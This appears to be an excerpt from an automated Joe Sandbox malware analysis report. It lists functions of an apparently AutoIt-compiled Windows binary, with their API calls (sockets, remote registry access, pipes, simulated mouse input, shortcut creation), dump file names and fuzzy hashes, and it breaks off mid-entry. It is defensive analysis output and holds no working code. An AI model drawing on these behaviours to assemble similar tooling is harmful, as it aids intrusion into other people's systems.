                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                    • String ID:
                                                                                                    • API String ID: 3761583154-0
                                                                                                    • Opcode ID: 98c2ccd18e250a59c5e7e8f7fff53727eecf40810fa43583de69486b63456a22
                                                                                                    • Instruction ID: 30059424687779054d23ed7721392f1f51617b5e2216dfdf539bc8abc04c1e55
                                                                                                    • Opcode Fuzzy Hash: 98c2ccd18e250a59c5e7e8f7fff53727eecf40810fa43583de69486b63456a22
                                                                                                    • Instruction Fuzzy Hash: 8C218375201214BFDF109FA8DC88DAA77ECEB493607048126F915CB3A1DB70EC4ACB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E0D8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 001E0DAE
                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001E0DEA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHandlePipe
                                                                                                    • String ID: nul
                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                    • Opcode ID: 0d5e3f3e62d222ce2388249738ab4f5fcb33a1a21bc423cfd4f7006a1c523ad5
                                                                                                    • Instruction ID: a407c3b9f95502e9c7fc2f7f3ed75d8885cb1b37cfe69e8d857ee602ccace9a4
                                                                                                    • Opcode Fuzzy Hash: 0d5e3f3e62d222ce2388249738ab4f5fcb33a1a21bc423cfd4f7006a1c523ad5
                                                                                                    • Instruction Fuzzy Hash: 5A217174500745AFDB218FA6DC04A9EBBE4BF59720F204E29F9A1D72D1E7B19C90CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00204A0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00177759
                                                                                                      • Part of subcall function 0017771B: GetStockObject.GDI32(00000011), ref: 0017776D
                                                                                                      • Part of subcall function 0017771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00177777
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00204A71
                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00204A7E
                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00204A89
                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00204A98
                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00204AA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                    • String ID: Msctls_Progress32
                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                    • Opcode ID: 26e39b986286231de110c61bef1d3e64f354336d3a5e0054a374e54a29bef21f
                                                                                                    • Instruction ID: 36dc9a7d4fd7062ba7249b74cdb9532c8979efeedfe492a46a5c42af0af58cc0
                                                                                                    • Opcode Fuzzy Hash: 26e39b986286231de110c61bef1d3e64f354336d3a5e0054a374e54a29bef21f
                                                                                                    • Instruction Fuzzy Hash: 2611B6B225021DBEEF119F64CC85EE77FADEF09758F008111FB18A6091C7719C219BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DE223 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001DE23D
                                                                                                    • LoadStringW.USER32(00000000), ref: 001DE244
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001DE25A
                                                                                                    • LoadStringW.USER32(00000000), ref: 001DE261
                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001DE2A5
                                                                                                    Strings
                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 001DE282
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                    • Opcode ID: fc8071bbf6691be4d60be2a3d5ca1e7d6747716340fbe87c312cd794e8dca396
                                                                                                    • Instruction ID: adc9494756b460bfa253ac85cdf3ab309f36d402d03b898564bd34ce93721bd8
                                                                                                    • Opcode Fuzzy Hash: fc8071bbf6691be4d60be2a3d5ca1e7d6747716340fbe87c312cd794e8dca396
                                                                                                    • Instruction Fuzzy Hash: 6A011DF6900308BFE711A7E4AD8DEE7776CDB08305F414592B74AE6142EA749E848B71
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F25BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001F271D
                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001F273E
                                                                                                    • WSAGetLastError.WSOCK32 ref: 001F274F
                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 001F2838
                                                                                                    • inet_ntoa.WSOCK32(?), ref: 001F27E9
                                                                                                      • Part of subcall function 001D4277: _strlen.LIBCMT ref: 001D4281
                                                                                                      • Part of subcall function 001F3B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,001EF569), ref: 001F3B9D
                                                                                                    • _strlen.LIBCMT ref: 001F2892
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                    • String ID:
                                                                                                    • API String ID: 3203458085-0
                                                                                                    • Opcode ID: 0898930d9f1932521dfc15d72b509135a6140e7f2a3552e7757606568e1cd96a
                                                                                                    • Instruction ID: dcc10cda0165c40d395f817ff4b23776f68aa516adb74199192c87863db21b83
                                                                                                    • Opcode Fuzzy Hash: 0898930d9f1932521dfc15d72b509135a6140e7f2a3552e7757606568e1cd96a
                                                                                                    • Instruction Fuzzy Hash: 95B1F071204304AFD324DF64C895E3A7BF5AF98318F54854CF69A8B2A2CB71ED46CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A0547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __allrem.LIBCMT ref: 001A044A
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A0466
                                                                                                    • __allrem.LIBCMT ref: 001A047D
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A049B
                                                                                                    • __allrem.LIBCMT ref: 001A04B2
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A04D0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1992179935-0
                                                                                                    • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                                    • Instruction ID: 837388c7e56d5707ee6a693e528beaaa421cbd0d2984933d13b9f65d1d2096c6
                                                                                                    • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                                    • Instruction Fuzzy Hash: 9881F97AA007069FDB269E78CC81B6A73E8BF5E724F24412EF611D7291E770D9008791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A658E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00198669,00198669,?,?,?,001A67DF,00000001,00000001,8BE85006), ref: 001A65E8
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001A67DF,00000001,00000001,8BE85006,?,?,?), ref: 001A666E
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001A6768
                                                                                                    • __freea.LIBCMT ref: 001A6775
                                                                                                      • Part of subcall function 001A3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00196A99,?,0000015D,?,?,?,?,001985D0,000000FF,00000000,?,?), ref: 001A3BE2
                                                                                                    • __freea.LIBCMT ref: 001A677E
                                                                                                    • __freea.LIBCMT ref: 001A67A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: 15469e303f4b81a48c543ea970f358835e7b428163d12cc51de0605bddea5d94
                                                                                                    • Instruction ID: fbcc9bd5efee93d33aa15992e948516a846229d89b2e04cb700b8c9c3d49947c
                                                                                                    • Opcode Fuzzy Hash: 15469e303f4b81a48c543ea970f358835e7b428163d12cc51de0605bddea5d94
                                                                                                    • Instruction Fuzzy Hash: 9B51F57A610216AFDB258FA4CC81EBF77AAEF56754F194228FC14D6150EB38DC40C6A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001FC53A Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001FC00D,?,?), ref: 001FD314
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD350
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3C7
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3FD
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001FC629
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001FC684
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001FC6C9
                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001FC6F8
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001FC752
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001FC75E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1120388591-0
                                                                                                    • Opcode ID: 986a43c6f3a287afe0f02310779e4e87318fc60bb97b98f562bd516fbb337f54
                                                                                                    • Instruction ID: d074c4ac7e1fa400faffc82140633bc209591de1563c0b006e2bbc1f3d7d80dc
                                                                                                    • Opcode Fuzzy Hash: 986a43c6f3a287afe0f02310779e4e87318fc60bb97b98f562bd516fbb337f54
                                                                                                    • Instruction Fuzzy Hash: F281AA70208249AFD714EF24C984E3ABBF5BF84318F14895CF5498B2A2DB31ED45DB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D003D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 001D0049
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001D00F0
                                                                                                    • VariantCopy.OLEAUT32(001D02F4,00000000), ref: 001D0119
                                                                                                    • VariantClear.OLEAUT32(001D02F4), ref: 001D013D
                                                                                                    • VariantCopy.OLEAUT32(001D02F4,00000000), ref: 001D0141
                                                                                                    • VariantClear.OLEAUT32(?), ref: 001D014B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3859894641-0
                                                                                                    • Opcode ID: 1740497731b36eeaa9c99bc281edbd4bb8d6e02b708c5570084677dd978b9865
                                                                                                    • Instruction ID: 47a1054de3ec4e2805191f91214c15195d9c18dfdcf831d442a038f220f5350d
                                                                                                    • Opcode Fuzzy Hash: 1740497731b36eeaa9c99bc281edbd4bb8d6e02b708c5570084677dd978b9865
                                                                                                    • Instruction Fuzzy Hash: C651F631641310ABCF26AB64A899B29B3B5EF6D310F14944BF906DF396DB70DC40CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00208B3A Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,001CFB8F,00000000,?,?,00000000,?,001B39BC,00000004,00000000,00000000), ref: 00208BAB
                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00208BD1
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00208C30
                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00208C44
                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00208C6A
                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00208C8E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 642888154-0
                                                                                                    • Opcode ID: b31aa96ee4e5a34ce1e50c17b92dd71010af367eebac6d2c1c7846a0d76ee061
                                                                                                    • Instruction ID: df1a0f4b7f084d22e0adc4f7cc09f547b829b2157c239fb6a108e56ecdfa7062
                                                                                                    • Opcode Fuzzy Hash: b31aa96ee4e5a34ce1e50c17b92dd71010af367eebac6d2c1c7846a0d76ee061
                                                                                                    • Instruction Fuzzy Hash: EE416374612345EFDB15CF14D889BA67BF0BB4A308F184169E6888F2E3DB71A865CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F2C37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 001F2C45
                                                                                                      • Part of subcall function 001EEE49: GetWindowRect.USER32(?,?), ref: 001EEE61
                                                                                                    • GetDesktopWindow.USER32 ref: 001F2C6F
                                                                                                    • GetWindowRect.USER32(00000000), ref: 001F2C76
                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 001F2CB2
                                                                                                    • GetCursorPos.USER32(?), ref: 001F2CDE
                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001F2D3C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                    • String ID:
                                                                                                    • API String ID: 2387181109-0
                                                                                                    • Opcode ID: a880af2a495e0fb51ca14e94e52a4e6128815c062ba22adcc69ade0ce77a906e
                                                                                                    • Instruction ID: cbad04cf14368518c0df9ae002955eae6be819cd2ff3d2827ac8c363ef47cf0a
                                                                                                    • Opcode Fuzzy Hash: a880af2a495e0fb51ca14e94e52a4e6128815c062ba22adcc69ade0ce77a906e
                                                                                                    • Instruction Fuzzy Hash: D231F2725053199BD720DF54D848BAFB7E9FF84354F00051AF99597281C731EA09CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E6178 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00175558,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0017559E
                                                                                                    • _wcslen.LIBCMT ref: 001E61D5
                                                                                                    • CoInitialize.OLE32(00000000), ref: 001E62EF
                                                                                                    • CoCreateInstance.OLE32(00210CC4,00000000,00000001,00210B34,?), ref: 001E6308
                                                                                                    • CoUninitialize.OLE32 ref: 001E6326
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                    • String ID: .lnk
                                                                                                    • API String ID: 3172280962-24824748
                                                                                                    • Opcode ID: 5035c22b440a107966ece31e54bebd24e2b29093f2d0529293286163c664c66c
                                                                                                    • Instruction ID: c3f0386ff5732e20e9de0f79dc42f09fa6e49aef82ddb1d8431ece6977e096fd
                                                                                                    • Opcode Fuzzy Hash: 5035c22b440a107966ece31e54bebd24e2b29093f2d0529293286163c664c66c
                                                                                                    • Instruction Fuzzy Hash: 0AD142716086019FC714EF25C484A2EBBF2FFA9754F548858F88A9B361CB31EC45CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D2104 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D210F
                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 001D211B
                                                                                                    • CloseHandle.KERNEL32(?), ref: 001D2124
                                                                                                    • CloseHandle.KERNEL32(?), ref: 001D212C
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001D2135
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001D213C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 146765662-0
                                                                                                    • Opcode ID: 45f74fc5f0cf5a1fc2cfdcf75a0bda1c9e52e5872b71a3569d0b16c37e3de86b
                                                                                                    • Instruction ID: cdfa3082fb38e1ef3cd57a45a204fdae6494c56cefefec7b7ae2b7c45042f554
